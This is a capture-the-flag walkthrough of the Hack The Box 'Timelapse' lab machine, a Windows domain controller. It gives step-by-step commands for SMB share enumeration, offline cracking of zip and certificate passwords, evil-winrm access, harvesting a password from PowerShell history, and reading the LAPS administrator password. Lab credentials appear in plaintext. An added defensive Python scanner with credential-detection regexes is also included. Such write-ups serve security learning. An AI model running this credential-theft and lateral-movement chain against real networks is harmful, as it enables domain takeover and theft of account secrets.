nmap -p- -v -sV -A -sC --min-rate 10000 -Pn 10.10.11.152
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-14 21:22:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Issuer: commonName=dc01.timelapse.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-25T14:05:29
| Not valid after: 2022-10-25T14:25:29
| MD5: e233 a199 4504 0859 013f b9c5 e4f6 91c3
|_SHA-1: 5861 acf7 76b8 703f d01e e25d fc7c 9952 a447 7652
|_ssl-date: 2022-12-14T21:23:59+00:00; +7h59m59s from scanner time.
| tls-alpn:
|_ http/1.1
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-12-14T21:23:21
|_ start_date: N/A
From the scan we get the domain controller hostname dc01.timelapse.htb and the domain timelapse.htb.
Add the DC name to the hosts file.
Anonymous RPC login works, but the session has no permissions.
smbclient --no-pass -L //10.10.11.152
A backup file is found in the Shares share.
smbclient --no-pass //10.10.11.152/Shares
But this winrm backup zip is password protected.
zip2john winrm_backup.zip >1.txt
john --wordlist=/usr/share/wordlists/rockyou.txt 1.txt
john --show 1.txt
The output looks a bit odd, but the password should be supremelegacy.
Extraction succeeds.
unzip -P supremelegacy winrm_backup.zip
Googling "winrm pfx", wadcoms shows that once the pfx is converted to pem it can be used to connect with evil-winrm.
how-to-export-certificates-from-windows-for-use-in-apache-nginx-on-linux/
sudo apt install john-data
pfx2john legacyy_dev_auth.pfx|tee pfx.hash
john --wordlist=/usr/share/wordlists/rockyou.txt pfx.hash
This gives the password thuglegacy. Now convert the pfx to pem.
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out key.pem
Here it asks for a passphrase for the pem key; I just set it to test123.
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem
openssl rsa -in key.pem -out server.key
cert.pem holds the certificate (public key) and server.key is the unencrypted private key.
evil-winrm -i 10.10.11.152 -c cert.pem -k server.key -S
Administrator
babywyrm
Guest
krbtgt
legacyy
payl0ad
sinfulz
svc_deploy
thecybergeek
Uploading privescheck turned up nothing exploitable; SharpHound.exe was killed on upload and could not run. Nothing suspicious among the locally listening programs either. The only option left was to go through the files.
Under C:\Shares\HelpDesk there are several LAPS-related documents and an msi installer.
My guess is that this relates to LAPS storing passwords.
While checking the PowerShell history, the svc_deploy user's password turns up.
cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
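The credential above was recoverable because PSReadLine persists every interactive command to ConsoleHost_history.txt. As an added example (not part of the original writeup), the following Python script scans such a history file for command shapes that embed a credential literal (ConvertTo-SecureString ... -AsPlainText, net user ... /add, /pass: or -Password arguments) and reports them with the value redacted; the sample history and all secret values in it are constructed.

```python
import re
from typing import Dict, List

# Constructed sample of a PSReadLine ConsoleHost_history.txt (not the box's real file);
# every secret value below is made up.
SAMPLE_HISTORY = """\
Get-Process | Where-Object CPU -gt 100
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Constructed-P@ss1' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
Invoke-Command -ComputerName localhost -Credential $c -Port 5986 -UseSSL -SessionOption $so -ScriptBlock {whoami}
net user backupadm Constructed-P@ss2 /add
cmdkey /add:dc01 /user:svc_deploy /pass:Constructed-P@ss3
Get-ChildItem C:\\Shares\\HelpDesk
"""

# (rule name, regex); group 1 captures the secret so the report can redact it.
RULES = [
    ("ConvertTo-SecureString with -AsPlainText literal",
     re.compile(r"ConvertTo-SecureString\s+['\"]([^'\"]+)['\"].*-AsPlainText", re.I)),
    ("net user ... /add with inline password",
     re.compile(r"\bnet\s+user\s+\S+\s+(\S+)\s+/add", re.I)),
    ("password passed as a literal argument",
     re.compile(r"(?:/pass:|-Password\s+)['\"]?([^\s'\"]+)", re.I)),
]


def redact(secret: str) -> str:
    """Keep the first character and the length only, so the finding cannot leak the value."""
    return secret[0] + "*" * (len(secret) - 1) if secret else ""


def find_plaintext_credentials(history: str) -> List[Dict[str, object]]:
    """Return one finding per history line that embeds a credential literal."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(history.splitlines(), start=1):
        for name, rx in RULES:
            m = rx.search(line)
            if m:
                findings.append({"line": lineno, "rule": name, "redacted": redact(m.group(1))})
                break  # one finding per line is enough for the report
    return findings


if __name__ == "__main__":
    for f in find_plaintext_credentials(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['rule']} -> {f['redacted']}")
```

Any hit should be treated as a credential rotation, and for service accounts that run interactive sessions the history file can be disabled with Set-PSReadLineOption -HistorySaveStyle SaveNothing.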
A winrm login with these credentials succeeds.
evil-winrm -i dc01.timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
whoami /groups
The group list shows membership in TIMELAPSE\LAPS_Readers.
But LAPSToolkit, the tool found on hacktricks, also gets killed by AV, so another way to read the password is needed.
Googling "powershell read laps password" leads to the article export-laps-passwords-powershell.
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Export-Csv -Path "c:\users\danny\desktop\LAPS-$((Get-Date).ToString('MM-dd-yyyy')).csv" -NoTypeInformation
Only the first command is actually needed:
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
evil-winrm -i dc01.timelapse.htb -u administrator -p 'u%79X5wp3B69ZMbw44vFo61k' -S
Logged in successfully as administrator.
ls -Path c:\users -Recurse -Name root.txt
type c:\users\TRX\Desktop\root.txt